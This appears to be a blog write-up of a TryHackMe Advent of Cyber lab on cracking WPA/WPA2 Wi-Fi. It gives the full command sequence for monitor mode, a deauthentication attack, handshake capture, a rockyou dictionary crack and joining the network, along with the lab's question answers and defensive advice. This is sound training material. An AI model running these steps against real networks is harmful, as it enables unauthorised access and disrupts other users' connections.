THM AOC2024 DAY 11: Cracking Wi-Fi Security with WPA/WPA2
Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!
Learning Objectives
- Understand what Wi-Fi is
Gain a foundational understanding of how Wi-Fi operates and its importance in modern connectivity, both for individuals and organizations. - Explore its importance for an organisation
Learn why secure Wi-Fi networks are critical for business operations and how insecure Wi-Fi can lead to potential breaches. - Learn the different Wi-Fi attacks
Discover various Wi-Fi attack techniques, including WPA/WPA2 cracking, and understand the vulnerabilities that attackers exploit.
Tools Overview
- Airodump-ng: A tool for capturing wireless traffic and identifying potential targets in a Wi-Fi network.
- Aireplay-ng: Used to perform deauthentication attacks to force devices to reconnect, enabling handshake capture.
- Aircrack-ng: A powerful cracking tool that uses dictionary attacks to decrypt Wi-Fi passwords from captured handshakes.
- Monitor Mode: A wireless adapter mode allowing devices to capture all network traffic, crucial for analyzing and attacking Wi-Fi networks.
- Rockyou.txt Wordlist: A popular dictionary file used in brute-force attacks to crack passwords.
Task Walkthrough
Overview
Glitch demonstrates a WPA/WPA2 cracking attack to highlight the vulnerabilities in weak Wi-Fi passwords. By capturing a 4-way handshake and performing a dictionary attack, Glitch shows how an attacker can break into a Wi-Fi network and potentially exploit the connected devices.
Steps
Task 1: Initial Setup
- Start the VM and AttackBox.
- SSH into the VM using the provided credentials:bashCopy code
ssh glitch@MACHINE_IP Password: Password321
Task 2: Scan for Wi-Fi Networks
- Identify nearby networks using the
iw devandsudo iw dev wlan2 scancommands. - Take note of the target SSID and BSSID (e.g., MalwareM_AP, 02:00:00:00:00:00).
Task 3: Enable Monitor Mode
- Switch the wireless interface to monitor mode:bashCopy code
sudo ip link set dev wlan2 down sudo iw dev wlan2 set type monitor sudo ip link set dev wlan2 up
Task 4: Capture the Handshake
- Use
airodump-ngto scan and target the access point:bashCopy codesudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2 - In a separate terminal, deauthenticate the connected client:bashCopy code
sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2 - Confirm handshake capture in the
airodump-ngoutput.
Task 5: Crack the WPA/WPA2 Password
- Use
aircrack-ngto perform a dictionary attack with the Rockyou wordlist:bashCopy codesudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap - Note the decrypted PSK (password).
Task 6: Join the Network
- Use the cracked PSK to connect to the network:bashCopy code
wpa_passphrase MalwareM_AP 'ENTER_PSK_HERE' > config sudo wpa_supplicant -B -c config -i wlan2 - Confirm connection using
iw dev.
Questions and Solutions
- What is the BSSID of our wireless interface?
Answer: The BSSID shown in the output ofiw dev. - What is the SSID and BSSID of the access point? Format: SSID, BSSID
Answer: MalwareM_AP, 02:00:00:00:00:00 - What is the BSSID of the wireless interface that is already connected to the access point?
Answer: 02:00:00:00:01:00 - What is the PSK after performing the WPA cracking attack?
Answer: The password extracted fromaircrack-ngoutput.
Recap of Learning Objectives
Understand what Wi-Fi is
Wi-Fi (Wireless Fidelity) is a cornerstone of modern networking that allows devices to connect to the Internet and local networks without physical cabling. Operating on specific radio frequency bands (2.4 GHz and 5 GHz), Wi-Fi facilitates seamless communication by transmitting data packets wirelessly between access points (APs) and client devices. Each Wi-Fi network is identified by an SSID (Service Set Identifier), with encryption protocols like WPA2 securing the transmission. Understanding the mechanics of Wi-Fi—how it enables connectivity and the significance of pre-shared keys (PSKs)—helps organizations identify attack surfaces and mitigate risks like unauthorized access or data interception.
Explore its importance for an organisation
In an enterprise environment, Wi-Fi is essential for enabling flexible, scalable, and efficient network access for employees, guests, and IoT devices. It eliminates the physical limitations of wired connections, supporting mobility and collaboration. However, this convenience comes with risks. Poorly configured Wi-Fi networks or weak encryption protocols (e.g., WPA with weak PSKs) can lead to security vulnerabilities. Attackers can exploit open networks, intercept data, or launch man-in-the-middle attacks. Organizations must enforce secure configurations, such as using WPA3 encryption, segmenting guest and employee networks, and employing regular network audits to ensure security compliance.
Learn the different Wi-Fi attacks
Wi-Fi networks are a common target for attackers due to their widespread usage and inherent vulnerabilities. This task showcased techniques like WPA/WPA2 cracking, which exploits weak or default passwords. Using tools like airodump-ng and aireplay-ng, attackers can capture 4-way handshakes and launch brute-force attacks to decrypt PSKs. Additional threats include rogue access points, evil twin attacks, and WPS vulnerabilities. Each attack type highlights how adversaries can exploit misconfigurations, weak encryption, or user behavior. Defenders can counter these by disabling unnecessary features like WPS, enforcing complex PSKs, monitoring for rogue APs, and implementing intrusion detection systems (IDS) to identify anomalous Wi-Fi activity.
Why It Matters:
Wi-Fi security is a critical aspect of organizational cybersecurity. Weak or default passwords make networks vulnerable to attacks, potentially leading to data breaches and unauthorized access. By learning these techniques, security professionals can better defend against real-world threats and improve their overall security posture.
